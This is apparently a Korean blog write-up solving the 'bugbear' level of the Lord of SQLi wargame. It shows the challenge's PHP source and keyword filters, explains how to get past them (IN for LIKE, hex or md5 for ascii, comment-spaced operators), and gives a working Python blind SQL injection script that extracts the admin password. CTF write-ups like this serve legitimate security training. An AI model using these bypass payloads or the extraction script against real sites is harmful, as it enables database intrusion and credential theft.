LOS Lv.13 bugbear
bugbear
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
query : select id from prob_bugbear where id='guest' and pw='' and no=
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
$query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
highlight_file(__FILE__);
?>
Solution
1
2
3
4
5
6
7
no 입력값에는 {_, ., (), substr, ascii, =, or, and, 공백, like, 0x} 사용 불가
pw는 {'} 사용 불가함.
like가 사용 불가해서 비교 연산자를 IN으로 대체.
ascii는 ord로 대체하려했으나 ord에서 or 때문에 필터링 걸림.
이 부분은 다른 함수로 대체 가능함.
hex로 바꿔서 비교를 하던가 md5를 이용을 하는 등이 있음.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
url='https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies={'PHPSESSID':'[redacted]'}
pw=''
for i in range(1,9) :
for j in range(48,123) :
payload={'pw':'1','no':'1/**/||/**/id/**/in/**/("admin")/**/&&/**/hex(mid(pw,'+str(i)+',1))/**/in/**/(hex('+str(j)+'))#'}
# payload={'pw':'1','no':'1/**/||/**/id/**/in/**/("admin")/**/&&/**/md5(mid(pw,'+str(i)+',1))/**/in/**/(md5("'+chr(j)+'"))#'}
res=requests.get(url,headers=headers, params=payload, cookies=cookies)
#print(res.text)
if "Hello admin" in res.text :
pw+=chr(j)
print("pw : "+pw) # 52dc3991
break
This post is licensed under CC BY 4.0 by the author.